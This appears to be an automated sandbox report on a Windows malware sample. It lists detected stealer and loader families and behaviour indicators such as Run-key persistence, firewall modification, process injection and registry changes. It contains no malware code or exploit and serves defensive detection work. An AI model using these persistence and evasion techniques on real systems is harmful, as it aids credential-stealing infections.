Malware Analysis Report

2024-11-13 19:09

Sample ID 231111-11ynnsce56
Target 07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0
SHA256 07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0
Tags
glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor google dropper evasion infostealer loader persistence phishing rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0

Threat Level: Known bad

The file 07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0 was found to be: Known bad.

Malicious Activity Summary

Detect ZGRat V1

Glupteba payload

Detected google phishing page

SmokeLoader

Detect Mystic stealer payload

Stealc

Mystic

ZGRat

Glupteba

RedLine payload

RedLine

Modifies Windows Firewall

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Program crash

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 22:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 22:07

Reported

2023-11-11 22:10

Platform

win10-20231020-en

Max time kernel

9s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1448 set thread context of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 30744180eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 9d620f80eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 95d38180eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d3bf8d80eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 673e2780eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = defb0f82eb14da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
